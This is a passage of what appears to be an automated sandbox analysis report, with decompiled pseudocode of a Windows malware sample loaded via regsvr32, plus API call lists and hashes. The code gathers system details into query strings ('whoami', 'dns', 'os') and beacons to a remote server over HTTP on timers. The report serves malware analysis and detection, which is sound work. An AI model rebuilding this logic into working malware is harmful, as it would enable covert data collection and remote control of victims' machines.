                    					_t110 = _t110 + _t95; // executed
                    				}
                    				_t42 = E04F9256F(_t99); // executed
                    				_t104 = _t42;
                    				if(_t104 != 0) {
                    					_t87 =  *0x4f9a320; // 0xb2d5a8
                    					_t10 = _t87 + 0x4f9b8d4; // 0x736e6426
                    					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t90;
                    					HeapFree( *0x4f9a2d8, 0, _t104);
                    				}
                    				_t105 = E04F94B71();
                    				if(_t105 != 0) {
                    					_t82 =  *0x4f9a320; // 0xb2d5a8
                    					_t12 = _t82 + 0x4f9b8dc; // 0x6f687726
                    					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t85;
                    					HeapFree( *0x4f9a2d8, 0, _t105);
                    				}
                    				_t106 =  *0x4f9a3cc; // 0x5ac95b0
                    				_a24 = E04F97729(0x4f9a00a, _t106 + 4);
                    				_t46 =  *0x4f9a36c; // 0x0
                    				if(_t46 != 0) {
                    					_t78 =  *0x4f9a320; // 0xb2d5a8
                    					_t15 = _t78 + 0x4f9b8b6; // 0x3d736f26
                    					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t81;
                    				}
                    				_t47 =  *0x4f9a368; // 0x0
                    				if(_t47 != 0) {
                    					_t75 =  *0x4f9a320; // 0xb2d5a8
                    					_t17 = _t75 + 0x4f9b88d; // 0x3d706926
                    					wsprintfA(_t110 + _t113, _t17, _t47);
                    				}
                    				if(_a24 != 0) {
                    					_t108 = RtlAllocateHeap( *0x4f9a2d8, 0, 0x800);
                    					if(_t108 != 0) {
                    						E04F953EC(GetTickCount());
                    						_t54 =  *0x4f9a3cc; // 0x5ac95b0
                    						__imp__(_t54 + 0x40);
                    						asm("lock xadd [eax], ecx");
                    						_t58 =  *0x4f9a3cc; // 0x5ac95b0
                    						__imp__(_t58 + 0x40);
                    						_t60 =  *0x4f9a3cc; // 0x5ac95b0
                    						_t61 = E04F918BA(1, _t103, _t113,  *_t60); // executed
                    						_t111 = _t61;
                    						asm("lock xadd [eax], ecx");
                    						if(_t111 != 0) {
                    							StrTrimA(_t111, 0x4f9928c);
                    							_push(_t111);
                    							_t66 = E04F9252A();
                    							_a12 = _t66;
                    							if(_t66 != 0) {
                    								_t97 = __imp__;
                    								 *_t97(_t111, _v0);
                    								 *_t97(_t108, _v4);
                    								_t98 = __imp__;
                    								 *_t98(_t108, _v0);
                    								 *_t98(_t108, _t111);
                    								_t72 = E04F91AA2(0xffffffffffffffff, _t108, _v24, _v20); // executed
                    								_v52 = _t72;
                    								if(_t72 != 0 && _t72 != 0x10d2) {
                    									E04F95F6A();
                    								}
                    								HeapFree( *0x4f9a2d8, 0, _v16);
                    							}
                    							HeapFree( *0x4f9a2d8, 0, _t111);
                    						}
                    						RtlFreeHeap( *0x4f9a2d8, 0, _t108); // executed
                    					}
                    					HeapFree( *0x4f9a2d8, 0, _a16);
                    				}
                    				HeapFree( *0x4f9a2d8, 0, _t113);
                    				return _a12;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 04F96901
                    • wsprintfA.USER32 ref: 04F9694E
                    • wsprintfA.USER32 ref: 04F9696B
                    • wsprintfA.USER32 ref: 04F9698D
                    • wsprintfA.USER32 ref: 04F969B0
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F969C0
                    • wsprintfA.USER32 ref: 04F969E2
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F969F2
                    • wsprintfA.USER32 ref: 04F96A29
                    • wsprintfA.USER32 ref: 04F96A49
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F96A66
                    • GetTickCount.KERNEL32 ref: 04F96A76
                    • RtlEnterCriticalSection.NTDLL(05AC9570), ref: 04F96A8A
                    • RtlLeaveCriticalSection.NTDLL(05AC9570), ref: 04F96AA8
                      • Part of subcall function 04F918BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04F96ABB,?,05AC95B0), ref: 04F918E5
                      • Part of subcall function 04F918BA: lstrlen.KERNEL32(?,?,?,04F96ABB,?,05AC95B0), ref: 04F918ED
                      • Part of subcall function 04F918BA: strcpy.NTDLL ref: 04F91904
                      • Part of subcall function 04F918BA: lstrcat.KERNEL32(00000000,?), ref: 04F9190F
                      • Part of subcall function 04F918BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F9192C
                    • StrTrimA.SHLWAPI(00000000,04F9928C,?,05AC95B0), ref: 04F96ADA
                      • Part of subcall function 04F9252A: lstrlen.KERNEL32(05AC9B50,00000000,00000000,7691C740,04F96AE6,00000000), ref: 04F9253A
                      • Part of subcall function 04F9252A: lstrlen.KERNEL32(?), ref: 04F92542
                      • Part of subcall function 04F9252A: lstrcpy.KERNEL32(00000000,05AC9B50), ref: 04F92556
                      • Part of subcall function 04F9252A: lstrcat.KERNEL32(00000000,?), ref: 04F92561
                    • lstrcpy.KERNEL32(00000000,?), ref: 04F96AF9
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F96B00
                    • lstrcat.KERNEL32(00000000,?), ref: 04F96B0D
                    • lstrcat.KERNEL32(00000000,00000000), ref: 04F96B11
                      • Part of subcall function 04F91AA2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04F91B54
                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04F96B41
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F96B50
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,05AC95B0), ref: 04F96B5F
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F96B71
                    • HeapFree.KERNEL32(00000000,?), ref: 04F96B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                    • String ID: Ut
                    • API String ID: 1892477351-8415677
                    • Opcode ID: 6330b22abcaba9baf9cc872ab497a7b7cbe5a9ca70d9e6d1461a7da40519dfe4
                    • Instruction ID: 87866d4153c36e3e0694fc39a0c6e89032a23f5171de5cf1a704ce433487287b
                    • Opcode Fuzzy Hash: 6330b22abcaba9baf9cc872ab497a7b7cbe5a9ca70d9e6d1461a7da40519dfe4
                    • Instruction Fuzzy Hash: 23718B72900249AFEB129B64FC88F5A37E8FB48314F050518F959D7260DF3AEC1ADB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E04F92FC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
                    				signed int _v8;
                    				void* _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				void* __ebx;
                    				void* __edi;
                    				long _t63;
                    				intOrPtr _t64;
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				void* _t71;
                    				intOrPtr _t72;
                    				int _t75;
                    				void* _t76;
                    				void* _t77;
                    				void* _t79;
                    				void* _t82;
                    				intOrPtr _t86;
                    				intOrPtr _t90;
                    				intOrPtr* _t92;
                    				void* _t93;
                    				void* _t98;
                    				intOrPtr _t104;
                    				signed int _t108;
                    				char** _t110;
                    				int _t113;
                    				signed int _t115;
                    				intOrPtr* _t116;
                    				intOrPtr* _t118;
                    				intOrPtr* _t120;
                    				intOrPtr* _t122;
                    				intOrPtr _t125;
                    				intOrPtr _t130;
                    				int _t134;
                    				intOrPtr _t136;
                    				int _t139;
                    				CHAR* _t140;
                    				intOrPtr _t141;
                    				void* _t142;
                    				void* _t151;
                    				int _t152;
                    				void* _t153;
                    				intOrPtr _t154;
                    				void* _t156;
                    				long _t160;
                    				intOrPtr* _t161;
                    				intOrPtr* _t162;
                    				intOrPtr* _t165;
                    				void* _t166;
                    				void* _t168;
                    
                    				_t151 = __edx;
                    				_t142 = __ecx;
                    				_t63 = __eax;
                    				_v8 = 8;
                    				if(__eax == 0) {
                    					_t63 = GetTickCount();
                    				}
                    				_t64 =  *0x4f9a018; // 0x3639fe1b
                    				asm("bswap eax");
                    				_t65 =  *0x4f9a014; // 0x3a87c8cd
                    				_t140 = _a20;
                    				asm("bswap eax");
                    				_t66 =  *0x4f9a010; // 0xd8d2f808
                    				asm("bswap eax");
                    				_t67 =  *0x4f9a00c; // 0xeec43f25
                    				asm("bswap eax");
                    				_t68 =  *0x4f9a320; // 0xb2d5a8
                    				_t3 = _t68 + 0x4f9b633; // 0x74666f73
                    				_t152 = wsprintfA(_t140, _t3, 3, 0x3d170, _t67, _t66, _t65, _t64,  *0x4f9a02c,  *0x4f9a004, _t63);
                    				_t71 = E04F94B2C();
                    				_t72 =  *0x4f9a320; // 0xb2d5a8
                    				_t4 = _t72 + 0x4f9b673; // 0x74707526
                    				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
                    				_t168 = _t166 + 0x38;
                    				_t153 = _t152 + _t75;
                    				if(_a8 != 0) {
                    					_t136 =  *0x4f9a320; // 0xb2d5a8
                    					_t8 = _t136 + 0x4f9b67e; // 0x732526
                    					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
                    					_t168 = _t168 + 0xc;
                    					_t153 = _t153 + _t139; // executed
                    				}
                    				_t76 = E04F9256F(_t142); // executed
                    				_t141 = __imp__; // 0x74e05520
                    				_a8 = _t76;
                    				if(_t76 != 0) {
                    					_t130 =  *0x4f9a320; // 0xb2d5a8
                    					_t11 = _t130 + 0x4f9b8d4; // 0x736e6426
                    					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
                    					_t168 = _t168 + 0xc;
                    					_t153 = _t153 + _t134;
                    					HeapFree( *0x4f9a2d8, 0, _a8);
                    				}
                    				_t77 = E04F94B71();
                    				_a8 = _t77;
                    				if(_t77 != 0) {
                    					_t125 =  *0x4f9a320; // 0xb2d5a8
                    					_t15 = _t125 + 0x4f9b8dc; // 0x6f687726
                    					wsprintfA(_t153 + _a20, _t15, _t77);
                    					_t168 = _t168 + 0xc;
                    					HeapFree( *0x4f9a2d8, 0, _a8);
                    				}
                    				_t154 =  *0x4f9a3cc; // 0x5ac95b0
                    				_t79 = E04F97729(0x4f9a00a, _t154 + 4);
                    				_t160 = 0;
                    				_v16 = _t79;
                    				if(_t79 == 0) {
                    					L28:
                    					RtlFreeHeap( *0x4f9a2d8, _t160, _a20); // executed
                    					return _v8;
                    				} else {
                    					_t82 = RtlAllocateHeap( *0x4f9a2d8, 0, 0x800); // executed
                    					_a8 = _t82;
                    					if(_t82 == 0) {
                    						L27:
                    						HeapFree( *0x4f9a2d8, _t160, _v16);
                    						goto L28;
                    					}
                    					E04F953EC(GetTickCount());
                    					_t86 =  *0x4f9a3cc; // 0x5ac95b0
                    					__imp__(_t86 + 0x40);
                    					asm("lock xadd [eax], ecx");
                    					_t90 =  *0x4f9a3cc; // 0x5ac95b0
                    					__imp__(_t90 + 0x40);
                    					_t92 =  *0x4f9a3cc; // 0x5ac95b0
                    					_t93 = E04F918BA(1, _t151, _a20,  *_t92); // executed
                    					_t156 = _t93;
                    					_v24 = _t156;
                    					asm("lock xadd [eax], ecx");
                    					if(_t156 == 0) {
                    						L26:
                    						RtlFreeHeap( *0x4f9a2d8, _t160, _a8); // executed
                    						goto L27;
                    					}
                    					StrTrimA(_t156, 0x4f9928c);
                    					_push(_t156);
                    					_t98 = E04F9252A();
                    					_v12 = _t98;
                    					if(_t98 == 0) {
                    						L25:
                    						HeapFree( *0x4f9a2d8, _t160, _t156);
                    						goto L26;
                    					}
                    					_t161 = __imp__;
                    					 *_t161(_t156, _a4);
                    					 *_t161(_a8, _v16);
                    					_t162 = __imp__;
                    					 *_t162(_a8, _v12);
                    					_t104 = E04F95406( *_t162(_a8, _t156), _a8);
                    					_a4 = _t104;
                    					if(_t104 == 0) {
                    						_v8 = 8;
                    						L23:
                    						E04F95F6A();
                    						L24:
                    						HeapFree( *0x4f9a2d8, 0, _v12);
                    						_t160 = 0;
                    						goto L25;
                    					}
                    					_t108 = E04F922C7(_t141, 0xffffffffffffffff, _t156,  &_v20); // executed
                    					_v8 = _t108;
                    					if(_t108 == 0) {
                    						_t165 = _v20;
                    						_t115 = E04F91E51(_t165, _a4, _a12, _a16); // executed
                    						_v8 = _t115;
                    						_t116 =  *((intOrPtr*)(_t165 + 8));
                    						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                    						_t118 =  *((intOrPtr*)(_t165 + 8));
                    						 *((intOrPtr*)( *_t118 + 8))(_t118);
                    						_t120 =  *((intOrPtr*)(_t165 + 4));
                    						 *((intOrPtr*)( *_t120 + 8))(_t120);
                    						_t122 =  *_t165;
                    						 *((intOrPtr*)( *_t122 + 8))(_t122);
                    						E04F917AB(_t165);
                    					}
                    					if(_v8 != 0x10d2) {
                    						L18:
                    						if(_v8 == 0) {
                    							_t110 = _a12;
                    							if(_t110 != 0) {
                    								_t157 =  *_t110;
                    								_t163 =  *_a16;
                    								wcstombs( *_t110,  *_t110,  *_a16);
                    								_t113 = E04F95D6F(_t157, _t157, _t163 >> 1);
                    								_t156 = _v24;
                    								 *_a16 = _t113;
                    							}
                    						}
                    						goto L21;
                    					} else {
                    						if(_a12 != 0) {
                    							L21:
                    							E04F917AB(_a4);
                    							if(_v8 == 0 || _v8 == 0x10d2) {
                    								goto L24;
                    							} else {
                    								goto L23;
                    							}
                    						}
                    						_v8 = _v8 & 0x00000000;
                    						goto L18;
                    					}
                    				}
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 04F92FD8
                    • wsprintfA.USER32 ref: 04F93028
                    • wsprintfA.USER32 ref: 04F93045
                    • wsprintfA.USER32 ref: 04F93065
                    • wsprintfA.USER32 ref: 04F93091
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F930A3
                    • wsprintfA.USER32 ref: 04F930C4
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F930D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F93102
                    • GetTickCount.KERNEL32 ref: 04F93113
                    • RtlEnterCriticalSection.NTDLL(05AC9570), ref: 04F93127
                    • RtlLeaveCriticalSection.NTDLL(05AC9570), ref: 04F93145
                      • Part of subcall function 04F918BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04F96ABB,?,05AC95B0), ref: 04F918E5
                      • Part of subcall function 04F918BA: lstrlen.KERNEL32(?,?,?,04F96ABB,?,05AC95B0), ref: 04F918ED
                      • Part of subcall function 04F918BA: strcpy.NTDLL ref: 04F91904
                      • Part of subcall function 04F918BA: lstrcat.KERNEL32(00000000,?), ref: 04F9190F
                      • Part of subcall function 04F918BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F9192C
                    • StrTrimA.SHLWAPI(00000000,04F9928C,?,05AC95B0), ref: 04F9317C
                      • Part of subcall function 04F9252A: lstrlen.KERNEL32(05AC9B50,00000000,00000000,7691C740,04F96AE6,00000000), ref: 04F9253A
                      • Part of subcall function 04F9252A: lstrlen.KERNEL32(?), ref: 04F92542
                      • Part of subcall function 04F9252A: lstrcpy.KERNEL32(00000000,05AC9B50), ref: 04F92556
                      • Part of subcall function 04F9252A: lstrcat.KERNEL32(00000000,?), ref: 04F92561
                    • lstrcpy.KERNEL32(00000000,?), ref: 04F9319D
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F931A5
                    • lstrcat.KERNEL32(00000000,?), ref: 04F931B3
                    • lstrcat.KERNEL32(00000000,00000000), ref: 04F931B9
                      • Part of subcall function 04F95406: lstrlen.KERNEL32(?,00000000,05AC9D58,00000000,04F93C77,05AC9F7B,69B25F44,?,?,?,?,69B25F44,00000005,04F9A00C,4D283A53,?), ref: 04F9540D
                      • Part of subcall function 04F95406: mbstowcs.NTDLL ref: 04F95436
                      • Part of subcall function 04F95406: memset.NTDLL ref: 04F95448
                    • wcstombs.NTDLL ref: 04F9324A
                      • Part of subcall function 04F91E51: SysAllocString.OLEAUT32(?), ref: 04F91E92
                      • Part of subcall function 04F91E51: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04F91F14
                      • Part of subcall function 04F91E51: StrStrIW.SHLWAPI(?,006E0069), ref: 04F91F53
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 04F9328B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F93297
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,05AC95B0), ref: 04F932A3
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F932AF
                    • RtlFreeHeap.NTDLL(00000000,?), ref: 04F932BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                    • String ID: Ut
                    • API String ID: 3111183435-8415677
                    • Opcode ID: cd2dbfdbadb57d0a6c3532bd73dc2e5d5ec85f51aecd141bd5b39f64694d30b6
                    • Instruction ID: b8729c12811f8b7764deddcd5ec8c57f88d62473ae2c96a3b5f6fded780f8f06
                    • Opcode Fuzzy Hash: cd2dbfdbadb57d0a6c3532bd73dc2e5d5ec85f51aecd141bd5b39f64694d30b6
                    • Instruction Fuzzy Hash: 78911571900259BFEF15DFA8EC48E9A3BF9EB08314F158055F808D7260DB36AD56DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 4f95458-4f9548a memset CreateWaitableTimerA 103 4f9560b-4f95611 GetLastError 102->103 104 4f95490-4f954e9 _allmul SetWaitableTimer WaitForMultipleObjects 102->104 105 4f95615-4f9561f 103->105 106 4f954ef-4f954f2 104->106 107 4f95573-4f95579 104->107 108 4f954fd 106->108 109 4f954f4 call 4f93399 106->109 110 4f9557a-4f9557e 107->110 114 4f95507 108->114 115 4f954f9-4f954fb 109->115 112 4f9558e-4f95592 110->112 113 4f95580-4f95582 110->113 112->110 116 4f95594-4f9559e CloseHandle 112->116 113->112 117 4f9550b-4f95510 114->117 115->108 115->114 116->105 118 4f95523-4f95550 call 4f93a12 117->118 119 4f95512-4f95519 117->119 123 4f955a0-4f955a5 118->123 124 4f95552-4f9555d 118->124 119->118 120 4f9551b 119->120 120->118 125 4f955c4-4f955cc 123->125 126 4f955a7-4f955ad 123->126 124->117 127 4f9555f-4f9556f call 4f917c0 124->127 129 4f955d2-4f95600 _allmul SetWaitableTimer WaitForMultipleObjects 125->129 126->107 128 4f955af-4f955c2 call 4f95f6a 126->128 127->107 128->129 129->117 132 4f95606 129->132 132->107
                    C-Code - Quality: 83%
                    			E04F95458(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				void _v48;
                    				long _v52;
                    				struct %anon52 _v60;
                    				char _v72;
                    				long _v76;
                    				void* _v80;
                    				union _LARGE_INTEGER _v84;
                    				struct %anon52 _v92;
                    				void* _v96;
                    				void* _v100;
                    				union _LARGE_INTEGER _v104;
                    				long _v108;
                    				struct %anon52 _v124;
                    				long _v128;
                    				struct %anon52 _t46;
                    				void* _t51;
                    				long _t53;
                    				void* _t54;
                    				struct %anon52 _t61;
                    				long _t65;
                    				struct %anon52 _t66;
                    				void* _t69;
                    				void* _t73;
                    				signed int _t74;
                    				void* _t76;
                    				void* _t78;
                    				void** _t82;
                    				signed int _t86;
                    				void* _t89;
                    
                    				_t76 = __edx;
                    				_v52 = 0;
                    				memset( &_v48, 0, 0x2c);
                    				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                    				_v60 = _t46;
                    				if(_t46 == 0) {
                    					_v92.HighPart = GetLastError();
                    				} else {
                    					_push(0xffffffff);
                    					_push(0xff676980);
                    					_push(0);
                    					_push( *0x4f9a2e0);
                    					_v76 = 0;
                    					_v80 = 0;
                    					L04F9818A();
                    					_v84.LowPart = _t46;
                    					_v80 = _t76;
                    					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                    					_t51 =  *0x4f9a30c; // 0x2e8
                    					_v76 = _t51;
                    					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                    					_v108 = _t53;
                    					if(_t53 == 0) {
                    						if(_a8 != 0) {
                    							L4:
                    							 *0x4f9a2ec = 5;
                    						} else {
                    							_t69 = E04F93399(_t76); // executed
                    							if(_t69 != 0) {
                    								goto L4;
                    							}
                    						}
                    						_v104.LowPart = 0;
                    						L6:
                    						L6:
                    						if(_v104.LowPart == 1 && ( *0x4f9a300 & 0x00000001) == 0) {
                    							_v104.LowPart = 2;
                    						}
                    						_t74 = _v104.LowPart;
                    						_t58 = _t74 << 4;
                    						_t78 = _t89 + (_t74 << 4) + 0x38;
                    						_t75 = _t74 + 1;
                    						_v92.LowPart = _t74 + 1;
                    						_t61 = E04F93A12( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                    						_v124 = _t61;
                    						if(_t61 != 0) {
                    							goto L17;
                    						}
                    						_t66 = _v92;
                    						_t97 = _t66 - 3;
                    						_v104.LowPart = _t66;
                    						if(_t66 != 3) {
                    							goto L6;
                    						} else {
                    							_v124.HighPart = E04F917C0(_t75, _t97,  &_v72, _a4, _a8);
                    						}
                    						goto L12;
                    						L17:
                    						__eflags = _t61 - 0x10d2;
                    						if(_t61 != 0x10d2) {
                    							_push(0xffffffff);
                    							_push(0xff676980);
                    							_push(0);
                    							_push( *0x4f9a2e4);
                    							goto L21;
                    						} else {
                    							__eflags =  *0x4f9a2e8; // 0x0
                    							if(__eflags == 0) {
                    								goto L12;
                    							} else {
                    								_t61 = E04F95F6A();
                    								_push(0xffffffff);
                    								_push(0xdc3cba00);
                    								_push(0);
                    								_push( *0x4f9a2e8);
                    								L21:
                    								L04F9818A();
                    								_v104.LowPart = _t61;
                    								_v100 = _t78;
                    								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                    								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                    								__eflags = _t65;
                    								_v128 = _t65;
                    								if(_t65 == 0) {
                    									goto L6;
                    								} else {
                    									goto L12;
                    								}
                    							}
                    						}
                    						L25:
                    					}
                    					L12:
                    					_t82 =  &_v72;
                    					_t73 = 3;
                    					do {
                    						_t54 =  *_t82;
                    						if(_t54 != 0) {
                    							HeapFree( *0x4f9a2d8, 0, _t54);
                    						}
                    						_t82 =  &(_t82[4]);
                    						_t73 = _t73 - 1;
                    					} while (_t73 != 0);
                    					CloseHandle(_v80);
                    				}
                    				return _v92.HighPart;
                    				goto L25;
                    			}

                    APIs
                    • memset.NTDLL ref: 04F95472
                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F9547E
                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F954A6
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04F954C6
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04F966F1,?), ref: 04F954E1
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04F966F1,?,00000000), ref: 04F95588
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04F966F1,?,00000000,?,?), ref: 04F95598
                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04F955D2
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04F955EC
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F955F8
                      • Part of subcall function 04F93399: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05AC93D8,00000000,?,74E5F710,00000000,74E5F730), ref: 04F933E8
                      • Part of subcall function 04F93399: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05AC9410,?,00000000,30314549,00000014,004F0053,05AC93CC), ref: 04F93485
                      • Part of subcall function 04F93399: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F954F9), ref: 04F93497
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04F966F1,?,00000000,?,?), ref: 04F9560B
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                    • String ID: Ut
                    • API String ID: 3521023985-8415677
                    • Opcode ID: 3821899c4ef54d4fb7aa49b81b46f340f97bea9f216fffb40da6cdffbd02e9a4
                    • Instruction ID: edb91a009c3c4cf681eeca934ed461daec49cb93dea2b7e8c3b2c8b7423940a2
                    • Opcode Fuzzy Hash: 3821899c4ef54d4fb7aa49b81b46f340f97bea9f216fffb40da6cdffbd02e9a4
                    • Instruction Fuzzy Hash: C651B1B2808314BFEB119F25DC44D5BBBE9EB84368F104A1EF4A482190D775DD05CF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E04F97A34(void* __eax, void* __ecx, long __esi, char* _a4) {
                    				void _v8;
                    				long _v12;
                    				void _v16;
                    				void* _t34;
                    				void* _t38;
                    				void* _t40;
                    				int _t53;
                    				char* _t56;
                    				long _t57;
                    				void* _t58;
                    				intOrPtr _t59;
                    				long _t65;
                    
                    				_t65 = __esi;
                    				_t58 = __ecx;
                    				_v16 = 0xea60;
                    				__imp__( *(__esi + 4));
                    				_v12 = __eax + __eax;
                    				_t56 = E04F963FD(__eax + __eax + 1);
                    				if(_t56 != 0) {
                    					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
                    					if(_t53 == 0) {
                    						E04F917AB(_t56);
                    					} else {
                    						E04F917AB( *(__esi + 4));
                    						 *(__esi + 4) = _t56;
                    					}
                    				}
                    				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                    				 *(_t65 + 0x10) = _t34;
                    				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04F979C9) == 0xffffffff) {
                    					L15:
                    					return GetLastError();
                    				} else {
                    					ResetEvent( *(_t65 + 0x1c));
                    					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                    					 *(_t65 + 0x14) = _t38;
                    					if(_t38 != 0 || GetLastError() == 0x3e5 && E04F95867( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                    						_t59 =  *0x4f9a320; // 0xb2d5a8
                    						_t15 = _t59 + 0x4f9b743; // 0x544547
                    						_v8 = 0x84404000;
                    						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65);
                    						 *(_t65 + 0x18) = _t40;
                    						if(_t40 == 0) {
                    							goto L15;
                    						}
                    						_t57 = 4;
                    						_v12 = _t57;
                    						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                    							_v8 = _v8 | 0x00000100;
                    							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                    						}
                    						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                    							goto L15;
                    						} else {
                    							return 0;
                    						}
                    					} else {
                    						goto L15;
                    					}
                    				}
                    			}















                    APIs
                    • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 04F97A46
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
